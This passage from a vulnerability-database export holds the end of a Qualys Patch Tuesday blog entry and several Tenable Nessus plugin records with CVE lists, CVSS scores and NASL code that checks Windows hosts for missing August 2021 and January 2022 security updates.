qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/502309>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, August 2021\n * Adobe Patch Tuesday, August 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/502309>)\n\n[Webinar August 12, 2021 or on demand](<https://www.brighttalk.com/webcast/11673/502309>).\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T19:58:49", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (August 2021) \u2013 Microsoft 51 Vulnerabilities with 7 Critical, Adobe 29 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36061", "CVE-2021-36062", "CVE-2021-36063", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949"], "modified": "2021-08-10T19:58:49", "id": "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005095 or cumulative update 5005090. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005095: Windows Server 2008 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005095.NASL", "href": "https://www.tenable.com/plugins/nessus/152425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152425);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005095\");\n script_xref(name:\"MSKB\", value:\"5005090\");\n script_xref(name:\"MSFT\", value:\"MS21-5005095\");\n script_xref(name:\"MSFT\", value:\"MS21-5005090\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005095: Windows Server 2008 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005095\nor cumulative update 5005090. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-36936, CVE-2021-36937,\n CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-36927)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005095-security-only-update-a324fdbb-ce90-4c4d-8d9d-e9f2f2a57e0e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de72daa6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005090-monthly-rollup-8feea9cd-25f9-41ef-b8e1-815211dc4e6c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?910509c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005095 or Cumulative Update KB5005090.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005095',\n '5005090'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005095, 5005090])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:13:38", "description": "The remote Windows host is missing security update 5009621.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009621: Windows 7 and Windows Server 2008 R2 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21880", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21893", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21928"], "modified": "2022-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009621.NASL", "href": "https://www.tenable.com/plugins/nessus/156627", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156627);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21862\",\n \"CVE-2022-21880\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21893\",\n \"CVE-2022-21897\",\n \"CVE-2022-21899\",\n \"CVE-2022-21900\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\"\n );\n script_xref(name:\"MSFT\", value:\"MS22-5009610\");\n script_xref(name:\"MSFT\", value:\"MS22-5009621\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009621: Windows 7 and Windows Server 2008 R2 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009621.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21850, \n CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21880, CVE-2022-21904, \n CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, \n CVE-2022-21924)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21862, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, \n CVE-2022-21908, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009621\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5009621 or Cumulative Update 5009610\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21851\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-21922\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009621',\n '5009610'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009621, 5009610])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:06", "description": "The remote Windows host is missing security update 5005089 or cumulative update 5005088. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005089.NASL", "href": "https://www.tenable.com/plugins/nessus/152436", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152436);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005088\");\n script_xref(name:\"MSKB\", value:\"5005089\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005088\");\n script_xref(name:\"MSFT\", value:\"MS21-5005089\");\n\n script_name(english:\"KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005089\nor cumulative update 5005088. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005089-security-only-update-28805642-8266-40f9-a2be-9003329f661c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?383d9541\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005088-monthly-rollup-69ec750d-30ee-4cbd-82eb-0b1ec2fd5f78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d931097\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005089 or Cumulative Update KB5005088.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005089',\n '5005088'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005089, 5005088])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:17", "description": "The remote Windows host is missing security update 5009619.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009619: Windows Server 2012 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21867", "CVE-2022-21870", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21880", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", 